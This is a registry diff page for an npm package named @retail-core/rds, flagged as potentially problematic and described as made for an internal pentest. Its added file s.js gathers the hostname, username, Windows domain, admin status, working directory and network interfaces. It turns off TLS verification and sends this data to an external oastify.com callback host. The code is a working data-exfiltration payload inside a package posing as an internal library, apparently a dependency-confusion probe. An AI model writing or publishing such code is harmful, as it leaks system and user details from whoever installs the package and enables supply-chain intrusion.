@retail-core/rds 2.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @retail-core/rds might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/package.json +11 -0
  3. package/s.js +37 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "@retail-core/rds",
3
+ "version": "2.0.2",
4
+ "description": "Package created for an Internal Pentest by Milad Fadavvi",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/s.js ADDED
@@ -0,0 +1,37 @@
1
+ var os = require('os');
2
+ var hostname = os.hostname();
3
+ var username = os.userInfo().username;
4
+ var platform = os.platform();
5
+ var networkInterfaces = os.networkInterfaces();
6
+
7
+ var admin_text;
8
+
9
+ if (platform == 'win32' || platform == 'win64') {
10
+ try {
11
+ net_session = require('child_process').execSync('net session');
12
+ admin_text = 'admin';
13
+ }
14
+ catch {
15
+ admin_text = 'non-admin';
16
+ }
17
+
18
+ username = require('child_process').execSync('systeminfo | findstr /B Domain').toString().replace('Domain:', '').trim() + '/' + username;
19
+
20
+ } else {
21
+ admin_text = os.userInfo().uid;
22
+ }
23
+
24
+ process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
25
+
26
+ const https = require('https')
27
+ const options = {
28
+ hostname: 'b1dnpphs1pzuabnbs90n3gtkabg14q.oastify.com',
29
+ port: 443,
30
+ path: '/?Username=' + encodeURI(username + ' (' + admin_text + ')') + '&Hostname=' + encodeURI(hostname) + '&Package=rds&PWD=' + __dirname + '&ip='+ encodeURI(networkInterfaces),
31
+ method: 'GET'
32
+ }
33
+
34
+ const req = https.request(options)
35
+
36
+ req.end();
37
+